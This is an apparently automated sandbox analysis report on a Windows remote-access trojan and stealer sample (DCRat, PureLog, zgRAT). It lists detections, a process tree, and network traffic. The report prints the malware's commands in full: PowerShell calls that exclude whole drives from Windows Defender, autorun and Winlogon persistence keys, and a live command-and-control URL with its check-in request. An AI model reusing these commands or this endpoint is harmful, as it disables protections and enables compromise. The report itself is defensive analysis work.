Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qNdO4D18CF.exe

Overview

General Information

Sample name:qNdO4D18CF.exe
renamed because original name is a hash value
Original sample name:CE2EC4539435DFEAC7E246FE5565C521.exe
Analysis ID:1565523
MD5:ce2ec4539435dfeac7e246fe5565c521
SHA1:59f3da006005a109914c31b5d5cd94dc4c93309c
SHA256:d5ee74f4f460c4f861c01ecc3e22b679075949108b6fee594193695d4175d562
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • qNdO4D18CF.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\qNdO4D18CF.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
    • csc.exe (PID: 7556 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7616 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA90.tmp" "c:\Windows\System32\CSCA9DA535D810450AA35B2C9F27DA16D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7644 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2416 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7652 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7668 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7692 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7716 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7724 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7812 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7824 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7880 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7896 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7920 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7952 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7980 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Steam\steamclient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8012 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qNdO4D18CF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8040 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XyagYCCOZX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8592 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 8936 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • steamclient.exe (PID: 5900 cmdline: "C:\Program Files (x86)\Steam\steamclient.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
  • steamclient.exe (PID: 9028 cmdline: "C:\Program Files (x86)\Steam\steamclient.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
    • cmd.exe (PID: 6824 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Steam\steamclient.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • steamclient.exe (PID: 6624 cmdline: "C:\Program Files (x86)\Steam\steamclient.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
  • qNdO4D18CF.exe (PID: 2088 cmdline: "C:\Users\user\Desktop\qNdO4D18CF.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
  • steamclient.exe (PID: 9104 cmdline: "C:\Program Files (x86)\Steam\steamclient.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
  • qNdO4D18CF.exe (PID: 2424 cmdline: "C:\Users\user\Desktop\qNdO4D18CF.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
  • steamclient.exe (PID: 6512 cmdline: "C:\Program Files (x86)\Steam\steamclient.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
    • cmd.exe (PID: 6732 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Steam\steamclient.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • steamclient.exe (PID: 3940 cmdline: "C:\Program Files (x86)\Steam\steamclient.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
  • qNdO4D18CF.exe (PID: 8732 cmdline: "C:\Users\user\Desktop\qNdO4D18CF.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
  • steamclient.exe (PID: 2920 cmdline: "C:\Program Files (x86)\Steam\steamclient.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
  • qNdO4D18CF.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\qNdO4D18CF.exe" MD5: CE2EC4539435DFEAC7E246FE5565C521)
    • cmd.exe (PID: 3272 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\Desktop\qNdO4D18CF.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • qNdO4D18CF.exe (PID: 1516 cmdline: C:\Users\user\Desktop\qNdO4D18CF.exe MD5: CE2EC4539435DFEAC7E246FE5565C521)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2019926937.000000001AE80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    00000000.00000002.2019926937.000000001AE80000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.1880880239.0000000012703000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000000.00000002.1880880239.0000000012703000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Process Memory Space: qNdO4D18CF.exe PID: 7436JoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.qNdO4D18CF.exe.1ae80000.25.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              0.2.qNdO4D18CF.exe.1ae80000.25.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.qNdO4D18CF.exe.1ae80000.25.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  0.2.qNdO4D18CF.exe.1ae80000.25.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7556, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\qNdO4D18CF.exe", ParentImage: C:\Users\user\Desktop\qNdO4D18CF.exe, ParentProcessId: 7436, ParentProcessName: qNdO4D18CF.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7644, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\Steam\steamclient.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\qNdO4D18CF.exe, ProcessId: 7436, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\steamclient
                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\Steam\steamclient.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\qNdO4D18CF.exe, ProcessId: 7436, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\qNdO4D18CF.exe", ParentImage: C:\Users\user\Desktop\qNdO4D18CF.exe, ParentProcessId: 7436, ParentProcessName: qNdO4D18CF.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline", ProcessId: 7556, ProcessName: csc.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\qNdO4D18CF.exe", ParentImage: C:\Users\user\Desktop\qNdO4D18CF.exe, ParentProcessId: 7436, ParentProcessName: qNdO4D18CF.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7644, ProcessName: powershell.exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\qNdO4D18CF.exe, ProcessId: 7436, TargetFilename: C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\qNdO4D18CF.exe", ParentImage: C:\Users\user\Desktop\qNdO4D18CF.exe, ParentProcessId: 7436, ParentProcessName: qNdO4D18CF.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7644, ProcessName: powershell.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\qNdO4D18CF.exe", ParentImage: C:\Users\user\Desktop\qNdO4D18CF.exe, ParentProcessId: 7436, ParentProcessName: qNdO4D18CF.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline", ProcessId: 7556, ProcessName: csc.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-30T04:28:03.264974+010020480951A Network Trojan was detected192.168.2.449742172.66.0.10280TCP
                    2024-11-30T04:28:28.374262+010020480951A Network Trojan was detected192.168.2.449790172.66.0.10280TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: qNdO4D18CF.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://390412cm.n9shteam.in/ProviderImagepipeTopacketbaseuniversaldle.phpAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\AppData\Local\Temp\XyagYCCOZX.batAvira: detection malicious, Label: BAT/Delbat.C
                    Multi AV Scanner detection for domain / URL
                    Source: 390412cm.n9shteam.inVirustotal: Detection: 13%Perma Link
                    Source: http://390412cm.n9shteam.in/ProviderImagepipeTopacketbaseuniversaldle.phpVirustotal: Detection: 5%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeReversingLabs: Detection: 68%
                    Source: C:\Users\user\Desktop\AFZZLiTQ.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\AFZZLiTQ.logVirustotal: Detection: 28%Perma Link
                    Source: C:\Users\user\Desktop\BCBhhiiL.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\BCBhhiiL.logVirustotal: Detection: 16%Perma Link
                    Source: C:\Users\user\Desktop\BdpSDMGd.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\BdpSDMGd.logVirustotal: Detection: 16%Perma Link
                    Source: C:\Users\user\Desktop\BuRPCyHG.logVirustotal: Detection: 10%Perma Link
                    Source: C:\Users\user\Desktop\BzfkqkWQ.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\CYASrcKR.logReversingLabs: Detection: 70%
                    Source: C:\Users\user\Desktop\CpOixJXm.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\CufHpEgE.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\DmprTJmg.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\EFxianyZ.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\EhArHZqU.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\GbyyMOOB.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\GpTgJexz.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\Gumzpbgc.logReversingLabs: Detection: 29%
                    Multi AV Scanner detection for submitted file
                    Source: qNdO4D18CF.exeReversingLabs: Detection: 68%
                    Machine Learning detection for dropped file
                    Source: C:\Program Files (x86)\Steam\steamclient.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: qNdO4D18CF.exeJoe Sandbox ML: detected
                    Source: qNdO4D18CF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: qNdO4D18CF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.pdb source: qNdO4D18CF.exe, 00000000.00000002.1760434359.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp

                    Spreading

                    barindex
                    Infects executable files (exe, dll, sys, html)
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49742 -> 172.66.0.102:80
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49790 -> 172.66.0.102:80
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: global trafficHTTP traffic detected: POST /ProviderImagepipeTopacketbaseuniversaldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 390412cm.n9shteam.inContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /ProviderImagepipeTopacketbaseuniversaldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 390412cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: 390412cm.n9shteam.in
                    Source: unknownHTTP traffic detected: POST /ProviderImagepipeTopacketbaseuniversaldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 390412cm.n9shteam.inContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 30 Nov 2024 03:28:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=svs1W%2F113TjHATkmrCi8eEf9mLPo62hK9HdjAhfSsTaOO2XkMID6wPW68O08UwaMT8eMZ564Hd%2BloNLIYTx3JUQU%2BpQxe%2Fj88ArZMKU5zFPtfDjmZjbqaw31LZZevmczEnkDPcnkNA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ea7bec28e60c35d-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=7658&min_rtt=1455&rtt_var=12952&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=624&delivery_rate=28582&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
